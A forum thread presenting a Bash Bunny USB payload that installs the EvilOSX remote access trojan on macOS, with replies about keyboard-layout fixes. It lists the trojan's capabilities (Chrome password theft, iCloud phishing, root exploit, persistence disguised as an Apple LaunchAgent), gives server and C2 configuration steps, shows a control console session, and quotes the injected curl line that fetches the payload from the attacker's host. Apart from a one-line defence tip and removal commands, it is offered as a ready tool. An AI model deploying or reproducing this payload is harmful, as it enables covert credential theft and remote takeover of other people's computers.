[PAYLOAD] untitled_EVILOSX

[stekole]

Please check git for the latest README/code

https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX

 

untitled_EVILOSX

 +  ______       _  _   ____    _____ __   __ 
 + |  ____|     (_)| | / __ \  / ____|\ \ / /
 + | |__ __   __ _ | || |  | || (___   \ V / 
 + |  __|\ \ / /| || || |  | | \___ \   > <  
 + | |____\ V / | || || |__| | ____) | / . \ 
 + |______|\_/  |_||_| \____/ |_____/ /_/ \_\\
 + untitled_ bash bunny edition    /   stekole

** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. ** ** Accessing a computer system or network without authorization or explicit permission is illegal. **

Features

• Client reconnects automatically/persistence
• ECM_ETHERNET and HID attack
• Emulate a simple terminal instance.
• Sockets are encrypted with CSR via OpenSSL.
• No dependencies (pure python).
• Retrieve Chrome passwords.
• Retrieve iCloud contacts.
• Attempt to get iCloud password via phishing.
• Show local iOS backups.
• Download and upload files.
• Retrieve find my iphone devices.
• Attempt to get root via local privilege escalation (<= 10.10.5).
• Auto installer

Configuration

Server

To prep your server you will need to download and follow the install instructions from EVILOSX.

On your server, download the EvilOSX code and run your server.

    git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX
    ./Server 

and type your listening port (1337)

Client

Before you deploy your bash bunny, update your configuration in the EvilOSX.py file

At the bottom of the file you will see a server and port variable

Set these to your server IP and listening port 

  #########################
  SERVER_HOST = "10.99.99.16"
  SERVER_PORT = 1337
  #########################

Usage

Plug in your bash bunny and wait until the script has finished running.

You should see the client connect to the server

root@kali:~/git/EvilOSX# ./Server.py 
  ______       _  _   ____    _____ __   __
 |  ____|     (_)| | / __ \  / ____|\ \ / /
 | |__ __   __ _ | || |  | || (___   \ V / 
 |  __|\ \ / /| || || |  | | \___ \   > <  
 | |____\ V / | || || |__| | ____) | / . \ 
 |______|\_/  |_||_| \____/ |_____/ /_/ \_\
 
[?] Port to listen on: 1337
[I] Type "help" to get a list of available commands.
> help
help              -  Show this help menu.
status            -  Show debug information.
clients           -  Show a list of clients.
connect <ID>      -  Connect to the client.
exit              -  Close the server and exit.
> clients
[I] 1 client(s) available:
    0 = client_hostname
> connect 0
[I] Connected to "client_hostname", ready to send commands.

Some of the other features can be found in the help menu. I have not tried them all

help              -  Show this help menu.
status            -  Show debug information.
clients           -  Show a list of clients.
connect <ID>      -  Connect to the client.
get_info          -  Show basic information about the client.
get_root          -  Attempt to get root via local privilege escalation.
download <path>   -  Downloads the file to the local machine.
upload <path>     -  Uploads the file to the remote machine.
chrome_passwords  -  Retrieve Chrome passwords.
icloud_contacts   -  Retrieve iCloud contacts.
icloud_phish      -  Attempt to get iCloud password via phishing.
itunes_backups    -  Show the user's local iOS backups.
find_my_iphone    -  Retrieve find my iphone devices.
screenshot        -  Takes a screenshot of the client.
kill_client       -  Brutally kill the client (removes the server).
exit              -  Exits the session.
Any other command will be executed on the connected client.

Removal of Tool

The python script gets added to users ~/Library/ directory - and startup file is added to the ~/Library/LaunchAgents directory

rm -rf ~/Library/Containers/.EvilOSX/
launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist

Defence

• disable the command-space short key for spotlight or disable spotlight all together if not needed

Todo

Issues

• I ran into a few issues with the "Build" of the python script. If the default one in this payload doesnt work, regenerate a new EvilOSX.py

Run ./BUILDER and enter the appropriate information:

After, copy this to your switch payload

Thanks

• @Marten4n6
• [YOURMOM](Check my room)

 

 

[RazerBlade]

Damn! I have been waiting for something like this. So AWESOME! Unfortunately it doesent work for me right know because of the keyboard file is wrong for Mac OS on the Swedish pro keyboard, not your problem. Keep it up!

[Rinilyn]

interesting.

[Pentester1975]

Does not work,

[Kaos39]

The payload works. I used with different mac -  Keyboard --> ITALIAN Lang.

You have just to modify the character output in the file payload.txt

EXAMPLE:

Original string in payload.txt is  --> QUACK STRING curl "http://$HOST_IP/EvilOSX.py" \> "/tmp/.config/s" 

the command "\>" with Italian KB set reports an error and the script didn't works until I changed  "\>" in "\|" 

QUACK STRING curl "http://$HOST_IP/EvilOSX.py" \| "/tmp/.config/s" 

The command "\>" needs to obtain the symbol "|" that it means run the command...

(I do not know if you understand my report... ahha"

Ciao

[GermanNoob]

@Kaos39:

Shouldn't that be solved by setting the right language file in the config.txt of BashBunny (firmware 1.5)? Did you try that? This would be much easier instead on working through all payloads...

[RazerBlade]

20 hours ago, GermanNoob said:

@Kaos39:

Shouldn't that be solved by setting the right language file in the config.txt of BashBunny (firmware 1.5)? Did you try that? This would be much easier instead on working through all payloads...

It's only for mac this problem occurs

[GermanNoob]

6 minutes ago, RazerBlade said:

It's only for mac this problem occurs

Ah, so we would need an Apple keyboard config file for each language to solve this?

[RazerBlade]

2 minutes ago, GermanNoob said:

Ah, so we would need an Apple keyboard for each language to solve this?

Yep